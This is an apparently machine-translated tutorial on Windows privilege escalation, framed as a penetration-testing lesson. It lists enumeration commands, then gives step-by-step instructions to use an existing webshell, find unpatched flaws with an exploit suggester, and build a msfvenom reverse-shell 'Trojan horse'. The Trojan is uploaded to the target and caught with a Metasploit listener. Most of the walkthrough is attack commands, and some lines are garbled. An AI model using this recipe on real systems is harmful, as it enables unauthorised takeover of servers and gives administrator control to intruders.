Escalation of Privilege: Overflow Vulnerability
Privilege escalation is referred to as privilege escalation . Since the operating system is a multi-user operating system , users have permission control . For example, the permissions obtained through Web vulnerabilities are Web process permissions. Often, Web services are started with an account with very low permissions. Therefore, some operations through the Webshell will be restricted, which requires it to be elevated to administrative or even System privileges. Privileges are usually escalated through operating system vulnerabilities or misconfigurations of the operating system, or through third-party software services, such as database or FTP software vulnerabilities.
Table of contents:
Escalation of Privilege: Overflow Vulnerability
Escalation of privileges from the web environment:
Step 2: Enter the terminal, print the system information and save it to a file.
Step 3: Find this file in the directory and download it to our computer.
Step 4: Download the overflow vulnerability tool. (wesng-master)
Step 5: Unzip the file and put the system information file we just downloaded into wesng-master.
Step 7: Execute the search for overflow vulnerabilities.
Step 8: Open the file we saved the vulnerability. (vuln1.csv)
Step 10: Generate a background program (Trojan horse)
Step 11: Upload the newly generated program to the server to be elevated.
Step 12: Install msf directly on our server. (I have msf in kali directly for testing here)
Step 13: Execute the program on the windows operating system and return to our server ( kali )
Step 14: View permissions. (Is it high permissions)
Disclaimer:
It is strictly forbidden to use the technology mentioned in this article to carry out illegal attacks, otherwise the consequences will be at your own risk, and the uploader will not bear any responsibility.
Windows common commands:
systeminfo //打印系统信息
whoami //获得当前用户名
whoami /priv //当前帐户权限
ipconfig //网络配置信息
ipconfig /displaydns //显示DNS缓存
route print //打印出路由表
arp -a //打印arp表
hostname //主机名
net user //列出用户
net user UserName //关于用户的信息
net use \SMBPATH Pa$$wOrd /u:UserName //连接SMB
net localgroup //列出所有组
net localgroup GROUP //关于指定组的信息
net view y127.0.0.1 //会话打开到当前计算机
net session //开放给其他机器
netsh firewall show config //显示防火墙配置
DRIVERQUERY //列出安装的驱动
tasklist /svc //列出服务任务
net start //列出启动的服务
dir /s foo //在目录中搜索包含指定字符的项
sc query //列出所有服务
sc qc ServiceName //找到指定服务的路径
shutdown /r /t 0 //立即重启
type file.txt //打印出内容
icacls “C:\Example" //列出权限
wmic qfe get Caption,Description,HotFixlD,InstalledOn //列出已安装的布丁 Escalation of privilege: overflow vulnerability.
Escalation of privileges from the web environment:
The first step: Escalation of rights means that we already have a Trojan horse or other methods to connect to the directory of the web site. ( Usually use a word Trojan horse. )
Step 2: Enter the terminal, print the system information and save it to a file.
systeminfo > systeminfo.txt
Step 3: Find this file in the directory and download it to our computer. ( Usually in the directory where we enter the command )
Step 4: Download the overflow vulnerability tool. ( wesng-master )
GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation
Step 5: Unzip the file and put the system information file we just downloaded into wesng-master.
Step 6: Open the command line and switch to the directory where the overflow vulnerability tool was just downloaded. ( wesng-master )
Step 7: Execute the search for overflow vulnerabilities.
python wes.py systeminfo.txt -o vuln1.csv
python :使用python
wes.py :是工具
systeminfo.txt //是我们刚刚从服务器下载的文件
-o vuln1.csv //是把这个结果保存到这个文件vuln1.csv中.
Step 8: Open the file we saved the vulnerability. ( vuln1.csv )
Step 9: Search for the vulnerability number directly on the Internet and use it. ( It is recommended to use msf for privilege escalation )
Step 10: Generate a background program (Trojan horse)
Background program (Trojan): https://tianyuk.blog.csdn.net/article/details/123541093
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105
lport=4444 -f exe > bgxg.exe
// lhost=kali的IP地址
// lport=端口号(比如4444)
// -f exe > 文件名.exe
Step 11: Upload to the server to be elevated .
Step 12: Install msf directly on our server. ( I have msf in kali directly for testing here ) ( the two servers must be able to communicate )
msfconsole //打开 msf 命令
use exploit/multi/handler //加载模块
set payload windows/meterpreter/reverse_tcp
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)
set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)
set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)
run //执行命令
Step 13: Execute the program on the windows operating system and return to our server ( kali )
Step 14: Check the authority. ( Is it a high authority ), if not, directly search for the vulnerability number on the Internet and use it. ( It is recommended to use msf to escalate the authority )
getuid 
Step 15: Search for the vulnerability number on the Internet and use it. ( Return to this environment to use the vulnerability to escalate )
